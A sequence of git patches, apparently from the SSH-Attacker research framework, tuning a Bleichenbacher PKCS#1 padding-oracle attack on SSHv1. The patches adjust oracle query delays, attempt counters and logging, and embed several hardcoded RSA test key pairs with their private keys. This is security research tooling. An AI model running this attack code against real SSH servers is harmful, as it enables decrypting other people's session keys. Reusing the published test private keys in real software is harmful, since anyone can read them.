serverKeys; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java index 806fc1305..a6f27038d 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/ServerDelegate.java @@ -19,7 +19,7 @@ public class ServerDelegate extends Delegate { protected Integer port = null; @Parameter(names = "-endless", description = "EndlessMode") - protected Boolean endless = null; + protected Boolean endless = false; public ServerDelegate() {} From 329de6dd89910eab8a014ab7eddb618ed287173d Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 29 Oct 2023 18:40:22 +0100 Subject: [PATCH 098/176] minor fixes, reducing timeout --- .../attacks/pkcs1/Bleichenbacher.java | 3 +- .../pkcs1/oracles/BleichenbacherOracle.java | 7 - .../nds/sshattacker/core/config/Config.java | 173 +++++++++++++++++- .../core/config/delegate/GeneralDelegate.java | 5 + .../ServerPublicKeyMessagePreparator.java | 6 +- 5 files changed, 181 insertions(+), 13 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index e5163015a..3efebd908 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -40,7 +40,6 @@ public class Bleichenbacher extends Pkcs1Attack { private int counterInnerBleichenbacher; private int counterOuterBleichenbacher; - /** * @param msg The message that should be decrypted with the attack * @param pkcsOracle The oracle to be queried @@ -103,7 +102,7 @@ private BigInteger find_smallest_s( BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); try { - Thread.sleep(500); + Thread.sleep(100); } catch (InterruptedException e) { throw new RuntimeException(e); } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 20c0cde43..2540e6934 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -42,7 +42,6 @@ public class BleichenbacherOracle extends Pkcs1Oracle { private final int maxAttempts; - /** * @param hostPublicKey The public key * @param config Config @@ -59,8 +58,6 @@ public BleichenbacherOracle( MathHelper.intCeilDiv(this.hostPublicKey.getModulus().bitLength(), Byte.SIZE); this.config = config; this.maxAttempts = 10; - this.counterOuterBleichenbacher = attemptCounterOuterBleichenbacher; - this.counterInnerBleichenbacher = attemptCounterInnerBleichenbacher; } /** @@ -117,11 +114,9 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { if (lastMessage instanceof DisconnectMessageSSH1) { LOGGER.debug("Received Disconnected Message -> nothing was correct .... :("); - counterOuterBleichenbacher++; } else if (lastMessage instanceof FailureMessageSSH1) { LOGGER.debug("Received Failure Message -> the first one was correct :|"); conform[0] = true; - counterInnerBleichenbacher++; } else if (lastMessage instanceof SuccessMessageSSH1) { LOGGER.debug("Received Failure Message -> both were correct :)"); conform[0] = true; @@ -130,8 +125,6 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { LOGGER.fatal("Something gone wrong with the preconfigured oracle...."); } - LOGGER.fatal("Attempt {}", counterInnerBleichenbacher + counterOuterBleichenbacher); - if (!trace.executedAsPlanned()) { // Something did not execute as planned, the result may be either way throw new WorkflowExecutionException("Workflow did not execute as planned!"); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java index abf7ff2ae..58d6601fe 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/Config.java @@ -825,10 +825,83 @@ public Config() { new XCurveEcPrivateKey( ArrayConverter.hexStringToByteArray( "092E829DE536BE8F7D74E7A3C6CD90EA6EADDDEEB2E50D8617EBDD132B53669B"), - NamedEcGroup.CURVE25519))); + NamedEcGroup.CURVE25519)), + // 768 Bit SSH RSA Hostkey -> for SSHv1 Testing + new SshPublicKey<>( + PublicKeyFormat.SSH_RSA, + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00CBD043B6C05475FA3361BAB21CD2" + + "58D703B61551A486991B601827176B" + + "3E060147B6A031B44AB557E43A9AC6" + + "BF0D569266501017C7055449975B61" + + "2650ED45DF03CB5B53A468117827B1" + + "D15C24253FBA68874DDD3827302EE9" + + "B01749716C9CD1", + 16)), + new CustomRsaPrivateKey( + new BigInteger( + "00852020CAA2EFC82BC81A02AF4A62" + + "1EC33ADA592C7DB1A91A17774F395D" + + "C42279FD948D284A222E371D8D2601" + + "C152FE02F18C2D3BBD97EBD9D34AA5" + + "DE558AFAF6B47B3A2D0A29E44729A9" + + "1DEFDA9712051B3EA2C79A307BBFDF" + + "257EB0A21369C1", + 16), + new BigInteger( + "00CBD043B6C05475FA3361BAB21CD2" + + "58D703B61551A486991B601827176B" + + "3E060147B6A031B44AB557E43A9AC6" + + "BF0D569266501017C7055449975B61" + + "2650ED45DF03CB5B53A468117827B1" + + "D15C24253FBA68874DDD3827302EE9" + + "B01749716C9CD1", + 16))), + // 1024 Bit SSH RSA Hostkey -> for SSHv1 Testing + new SshPublicKey<>( + PublicKeyFormat.SSH_RSA, + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)), + new CustomRsaPrivateKey( + new BigInteger( + "0092FAA9AC0FB31CBA0CCE07C460D1" + + "8B5088A02C7E0E88E6E8A9FD2207CA" + + "ECAAF7150ABB31EBAAD84EA32C0AB7" + + "C27E5F1230CD878BCD9BE7047BE040" + + "3FD9B13624D9C822AB17C96615BB5A" + + "875D1A076D282B2E9035FAC37DB066" + + "82C8498BA624C77B0E1E2ECBE7AB5A" + + "5A0342E20C54482D149A7F37F8EF4A" + + "2C148CD3ADD6782189", + 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)))); serverKeys = List.of( + // Default 1024 Bit Serverkey for SSHv1 new SshPublicKey<>( PublicKeyFormat.SSH_RSA, new CustomRsaPublicKey( @@ -866,6 +939,104 @@ public Config() { + "C5E4CB3A9E2ECEE52BB07C33F92893" + "A5D5B6F163BE6FBC1E8E66E4666866" + "871890105EFFE1193F", + 16))), + // Default 768 Bit Serverkey for SSHv1 + new SshPublicKey<>( + PublicKeyFormat.SSH_RSA, + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16)), + new CustomRsaPrivateKey( + new BigInteger( + "00B30F82CADCC13296E7FC5D420819" + + "49EDE560A99C68208906F48D4248A1" + + "00EFCE30D9A1398FED04619390D7D3" + + "9AE0ECB7DFB6A5EC8CA6A491097680" + + "9280CB64AF1F8C8B67739CF7093B34" + + "4343419647B331CD9827953279BE6C" + + "AC31C55BA6EF01", + 16), + new BigInteger( + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16))), + // Default 2048 Bit Serverkey for SSHv1 + new SshPublicKey<>( + PublicKeyFormat.SSH_RSA, + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "009DC14D07EADCB9AFF4C37E5961BA" + + "17EF728A8E8BF106AEDCE25AAD2282" + + "CEA7A9FAED27BE0EC988DCA1434216" + + "974D3078A0226182CF9A8945681263" + + "E0B7724F8A92D97DCF9D1BE9234D51" + + "8F91879078B72DB44DE8B9AB76568D" + + "6FE10A1264B947BBBFF3957A9F3699" + + "3EC3CD623A6D3E4B188476CC91C547" + + "00D0BD3CCB6872EDAF1E42CA69A206" + + "57E667D7760BEED1D817971B4F3764" + + "7A1E7AC85605E1AABC836B04CED2E8" + + "A389EA339116806FED939D12F26CB9" + + "D82D91DD5D9B5B86D052FC890F1305" + + "393C57656D37A691ABAD93D24251FC" + + "897E39BFED07679C16B8355C804EFA" + + "23BBF2A7CABEE87EF768E75D1D0CEF" + + "7251E09BD911DF7E7EFB3E0E8480FA" + + "7C57", + 16)), + new CustomRsaPrivateKey( + new BigInteger( + "132E4755AC2A09DC814737F827A31D" + + "92698119F14B0A999379AB80FD8513" + + "3D321E3BBA81C55C28916D0FFE3CC6" + + "D35E02A7D9CCECC56BAC771C30467B" + + "EBC658789E41EB043EA92036FB87F2" + + "1BE8E714DAF5FD36FA589BD5BBD696" + + "F5D46CDDCC6B856584DD295B1204B6" + + "35F229E7CA75299D96ACA0448BCF89" + + "062AACAC66F80228E8A2B4F7255944" + + "9843F398A2E3E09B4D9402CB50D425" + + "86CA6251B268624590BE96D34B67B7" + + "0AED343D979B91BC36697F15FA1BD7" + + "CF2528ED177A5BD03ECA6D65D8CA76" + + "C91F0B97335C1F7325860334EACB8D" + + "D05DAB103FC73AF6C377FCE7725063" + + "E2EB3680BA19EFB457AE905622D564" + + "A1BFA6686FD2D5B31024251483FA61", + 16), + new BigInteger( + "009DC14D07EADCB9AFF4C37E5961BA" + + "17EF728A8E8BF106AEDCE25AAD2282" + + "CEA7A9FAED27BE0EC988DCA1434216" + + "974D3078A0226182CF9A8945681263" + + "E0B7724F8A92D97DCF9D1BE9234D51" + + "8F91879078B72DB44DE8B9AB76568D" + + "6FE10A1264B947BBBFF3957A9F3699" + + "3EC3CD623A6D3E4B188476CC91C547" + + "00D0BD3CCB6872EDAF1E42CA69A206" + + "57E667D7760BEED1D817971B4F3764" + + "7A1E7AC85605E1AABC836B04CED2E8" + + "A389EA339116806FED939D12F26CB9" + + "D82D91DD5D9B5B86D052FC890F1305" + + "393C57656D37A691ABAD93D24251FC" + + "897E39BFED07679C16B8355C804EFA" + + "23BBF2A7CABEE87EF768E75D1D0CEF" + + "7251E09BD911DF7E7EFB3E0E8480FA" + + "7C57", 16)))); fallbackRsaTransientPublicKey = diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java index ebe1a027a..eaae894af 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/config/delegate/GeneralDelegate.java @@ -33,6 +33,9 @@ public class GeneralDelegate extends Delegate { @Parameter(names = "-quiet", description = "No output (sets logLevel to NONE)") private boolean quiet; + @Parameter(names = "-info", description = "Info output (sets logLevel to INFO)") + private boolean info; + public GeneralDelegate() {} public boolean isHelp() { @@ -64,6 +67,8 @@ public void applyDelegate(Config config) { Security.addProvider(new BouncyCastleProvider()); if (isDebug()) { Configurator.setAllLevels("de.rub.nds.sshattacker", Level.DEBUG); + } else if (info) { + Configurator.setAllLevels("de.rub.nds.sshattacker", Level.INFO); } else if (quiet) { Configurator.setAllLevels("de.rub.nds.sshattacker", Level.OFF); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index 304684f06..67b90b445 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -47,7 +47,7 @@ public void prepareMessageSpecificContents() { } public void prepareHostKey() { - SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(0); + SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(7); CustomRsaPublicKey publicKey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); if (!opt_hostKey.getPrivateKey().isPresent()) { @@ -80,7 +80,7 @@ public void prepareServerKey() { List> serverKeys = chooser.getConfig().getServerKeys(); if (!serverKeys.isEmpty()) { - SshPublicKey key = serverKeys.get(0); + SshPublicKey key = serverKeys.get(1); if (key.getPrivateKey().isPresent()) { CustomRsaPrivateKey privkey = (CustomRsaPrivateKey) key.getPrivateKey().get(); CustomRsaPublicKey pubkey = (CustomRsaPublicKey) key.getPublicKey(); @@ -178,7 +178,7 @@ private void prepareSessionID() { throw new RuntimeException(); } - SshPublicKey hostKey = chooser.getConfig().getHostKeys().get(0); + SshPublicKey hostKey = chooser.getConfig().getHostKeys().get(7); if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); hostModulus = rsaPublicKey.getModulus().toByteArray(); From dd0c38fc80a144243222d2918a8351d180b1df80 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 29 Oct 2023 20:48:21 +0100 Subject: [PATCH 099/176] removed unnecessary wait-time --- .../rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 3efebd908..a45916fe3 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -101,11 +101,11 @@ private BigInteger find_smallest_s( BigInteger cipher = new BigInteger(1, ciphertext); BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); - try { - Thread.sleep(100); +/* try { + Thread.sleep(1); } catch (InterruptedException e) { throw new RuntimeException(e); - } + }*/ boolean oracleResult = queryOracle(attempt, false); counterOuterBleichenbacher++; From 1bbd3e42a2e2c324eb18dfca1066a24b23b732f3 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 29 Oct 2023 21:18:12 +0100 Subject: [PATCH 100/176] re-insert waiting-time because of connection refused error --- .../attacks/pkcs1/Bleichenbacher.java | 6 +-- .../ServerPublicKeyMessagePreparator.java | 54 ++++++++++++------- 2 files changed, 38 insertions(+), 22 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index a45916fe3..0df076bda 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -101,11 +101,11 @@ private BigInteger find_smallest_s( BigInteger cipher = new BigInteger(1, ciphertext); BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); -/* try { - Thread.sleep(1); + try { + Thread.sleep(10); } catch (InterruptedException e) { throw new RuntimeException(e); - }*/ + } boolean oracleResult = queryOracle(attempt, false); counterOuterBleichenbacher++; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index 67b90b445..01173a265 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -27,6 +27,7 @@ public class ServerPublicKeyMessagePreparator extends SshMessagePreparator serverKey; + private SshPublicKey hostkey; public ServerPublicKeyMessagePreparator( Chooser chooser, ServerPublicKeyMessage message, HybridKeyExchangeCombiner combiner) { @@ -47,33 +48,48 @@ public void prepareMessageSpecificContents() { } public void prepareHostKey() { - SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(7); - CustomRsaPublicKey publicKey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); - if (!opt_hostKey.getPrivateKey().isPresent()) { - LOGGER.warn("no privat key defined for hostkey"); - } - if (opt_hostKey.getPublicKeyFormat().getName().equals(PublicKeyFormat.SSH_RSA.getName())) { - LOGGER.warn( - "the Host-Key is not formated as RSA Key-Type, it is {}", - opt_hostKey.getPublicKeyFormat().getName()); + List> hostkeys = chooser.getConfig().getHostKeys(); + if (!hostkeys.isEmpty()) { + SshPublicKey key = hostkeys.get(7); + if (key.getPrivateKey().isPresent()) { + CustomRsaPrivateKey privkey = (CustomRsaPrivateKey) key.getPrivateKey().get(); + CustomRsaPublicKey pubkey = (CustomRsaPublicKey) key.getPublicKey(); + this.hostkey = new SshPublicKey<>(PublicKeyFormat.SSH_RSA, pubkey, privkey); + } } - CustomRsaPrivateKey privateKey = (CustomRsaPrivateKey) opt_hostKey.getPrivateKey().get(); - SshPublicKey hostKey = - new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); - - getObject().setHostKey(hostKey); - chooser.getContext().getSshContext().setHostKey(hostKey); + /* + SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(7); + + CustomRsaPublicKey publicKey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); + + if (!opt_hostKey.getPrivateKey().isPresent()) { + LOGGER.warn("no privat key defined for hostkey"); + } + if (opt_hostKey.getPublicKeyFormat().getName().equals(PublicKeyFormat.SSH_RSA.getName())) { + LOGGER.warn( + "the Host-Key is not formated as RSA Key-Type, it is {}", + opt_hostKey.getPublicKeyFormat().getName()); + } + CustomRsaPrivateKey privateKey = (CustomRsaPrivateKey) opt_hostKey.getPrivateKey().get(); + + SshPublicKey hostKey = + new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); + */ + getObject().setHostKey(this.hostkey); + chooser.getContext().getSshContext().setHostKey(this.hostkey); - getObject().setHostKeyBitLenght(publicKey.getModulus().bitLength()); + getObject().setHostKeyBitLenght(this.hostkey.getPublicKey().getModulus().bitLength()); LOGGER.debug( "[bro] Hostkey Exponent: {}", - ArrayConverter.bytesToHexString(publicKey.getPublicExponent().toByteArray())); + ArrayConverter.bytesToHexString( + this.hostkey.getPublicKey().getPublicExponent().toByteArray())); LOGGER.debug( "[bro] Hostkey Modulus: {}", - ArrayConverter.bytesToHexString(publicKey.getModulus().toByteArray())); + ArrayConverter.bytesToHexString( + this.hostkey.getPublicKey().getModulus().toByteArray())); } public void prepareServerKey() { @@ -178,7 +194,7 @@ private void prepareSessionID() { throw new RuntimeException(); } - SshPublicKey hostKey = chooser.getConfig().getHostKeys().get(7); + SshPublicKey hostKey = chooser.getContext().getSshContext().getHostKey().orElse(null); if (hostKey.getPublicKey() instanceof CustomRsaPublicKey) { CustomRsaPublicKey rsaPublicKey = (CustomRsaPublicKey) hostKey.getPublicKey(); hostModulus = rsaPublicKey.getModulus().toByteArray(); From 341f61f4b56002194bf6ca6932be2a014d9974dc Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 31 Oct 2023 22:25:38 +0100 Subject: [PATCH 101/176] Adjusting Sleeptime and logging-info --- .../nds/sshattacker/attacks/impl/BleichenbacherAttacker.java | 4 ++-- .../de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index c9f8f8ac4..4d256a608 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -300,8 +300,8 @@ public void executeAttack() { long finish = System.currentTimeMillis(); long timeElapsed = finish - start; - LOGGER.debug("The attack took {} milliseconds", timeElapsed); - LOGGER.debug( + LOGGER.info("The attack took {} milliseconds", timeElapsed); + LOGGER.info( "It took {} tries for the inner and {} tries for the outer Bleichenbacher-Attack", attacker.getCounterInnerBleichenbacher(), attacker.getCounterOuterBleichenbacher()); diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java index 0df076bda..3efebd908 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/Bleichenbacher.java @@ -102,7 +102,7 @@ private BigInteger find_smallest_s( BigInteger res = cipher.multiply(exponentiated); BigInteger attempt = res.mod(rsaPublicKey.getModulus()); try { - Thread.sleep(10); + Thread.sleep(100); } catch (InterruptedException e) { throw new RuntimeException(e); } From a1557305552b6e55b66c9a9ee7bed4d73543168c Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 31 Oct 2023 22:25:46 +0100 Subject: [PATCH 102/176] fixing failure message --- .../nds/sshattacker/core/layer/impl/SSH1Layer.java | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index d4d8646fa..ee53f1ea9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -286,6 +286,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { LOGGER.debug("[bro] returning SSH_SMSG_SUCCESS Hint"); readSuccessMessage((BinaryPacket) packet); break; + case SSH_SMSG_FAILURE: + LOGGER.debug("[bro] returning SSH_SMSG_FAILURE Hint"); + readFailureMessage((BinaryPacket) packet); + break; default: LOGGER.debug( "[bro] cannot identifie {} as {} - returningn null", @@ -332,6 +336,16 @@ private void readSuccessMessage(AbstractPacket packet) { readContainerFromStream(message, context, temp_stream); } + private void readFailureMessage(AbstractPacket packet) { + FailureMessageSSH1 message = new FailureMessageSSH1(); + HintedInputStream temp_stream; + + temp_stream = + new HintedInputStreamAdapterStream( + null, new ByteArrayInputStream(packet.getPayload().getValue())); + readContainerFromStream(message, context, temp_stream); + } + public void readMessageForHint(PacketLayerHintSSHV1 hint) { switch (hint.getType()) { // use correct parser for the message From b4e8630ef9ff080fd0000aa921087b999e9521c0 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 31 Oct 2023 22:26:05 +0100 Subject: [PATCH 103/176] setting keys to the longer keysize (2048; 1024 bit) --- .../attacks/pkcs1/oracles/BleichenbacherOracle.java | 5 +++++ .../ssh1/preparator/ServerPublicKeyMessagePreparator.java | 4 ++-- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java index 2540e6934..4c9e23169 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java @@ -42,6 +42,8 @@ public class BleichenbacherOracle extends Pkcs1Oracle { private final int maxAttempts; + private int counter = 0; + /** * @param hostPublicKey The public key * @param config Config @@ -129,6 +131,9 @@ private boolean[] checkPKCSConformity(final byte[] msg, int currentAttempt) { // Something did not execute as planned, the result may be either way throw new WorkflowExecutionException("Workflow did not execute as planned!"); } + + counter++; + LOGGER.info("Try #{} ", counter); // clearConnections(state); } catch (WorkflowExecutionException e) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index 01173a265..bc134be1a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -51,7 +51,7 @@ public void prepareHostKey() { List> hostkeys = chooser.getConfig().getHostKeys(); if (!hostkeys.isEmpty()) { - SshPublicKey key = hostkeys.get(7); + SshPublicKey key = hostkeys.get(0); if (key.getPrivateKey().isPresent()) { CustomRsaPrivateKey privkey = (CustomRsaPrivateKey) key.getPrivateKey().get(); CustomRsaPublicKey pubkey = (CustomRsaPublicKey) key.getPublicKey(); @@ -96,7 +96,7 @@ public void prepareServerKey() { List> serverKeys = chooser.getConfig().getServerKeys(); if (!serverKeys.isEmpty()) { - SshPublicKey key = serverKeys.get(1); + SshPublicKey key = serverKeys.get(0); if (key.getPrivateKey().isPresent()) { CustomRsaPrivateKey privkey = (CustomRsaPrivateKey) key.getPrivateKey().get(); CustomRsaPublicKey pubkey = (CustomRsaPublicKey) key.getPublicKey(); From 87e0f2b9260e1949086616d6e2b434e05757a651 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 6 Nov 2023 23:30:40 +0100 Subject: [PATCH 104/176] fixing bleichenbacher --- .../attacks/impl/BleichenbacherAttacker.java | 250 ++++++++++++------ .../attacks/pkcs1/Bleichenbacher.java | 4 +- .../ClientSessionKeyMessageHandler.java | 27 +- 3 files changed, 184 insertions(+), 97 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 4d256a608..171d37ecc 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -19,7 +19,6 @@ import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; -import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import java.math.BigInteger; @@ -160,9 +159,7 @@ public void executeAttack() { return; }*/ // RSAPublicKey publicKey = getServerPublicKey(); - getPublicKeys(); - getHostPublicKey(); - getServerPublicKey(); + /*if (publicKey == null) { LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?"); return; @@ -176,112 +173,193 @@ public void executeAttack() { throw new ConfigurationException("The key exchange algorithm must be set."); }*/ + // --UnComment FOR "NORMAL" NOES + getPublicKeys(); + getHostPublicKey(); + getServerPublicKey(); LOGGER.info( String.format( "Fetched server public key with exponent %s and modulus: %s", hostPublicKey.getPublicExponent().toString(16), hostPublicKey.getModulus().toString(16))); - byte[] encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); - if ((encryptedSecret.length * Byte.SIZE) != hostPublicKey.getModulus().bitLength()) { - throw new ConfigurationException( - "The length of the encrypted secret " - + "is not equal to the public key length. Have you selected the correct value?"); - } - try { - Thread.sleep(500); - } catch (InterruptedException e) { - throw new RuntimeException(e); - } - // byte[] encryptedSecret = - // ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); + // ---- + + /*CustomRsaPrivateKey hostPrivatKey = + new CustomRsaPrivateKey( + new BigInteger( + "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" + + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" + + 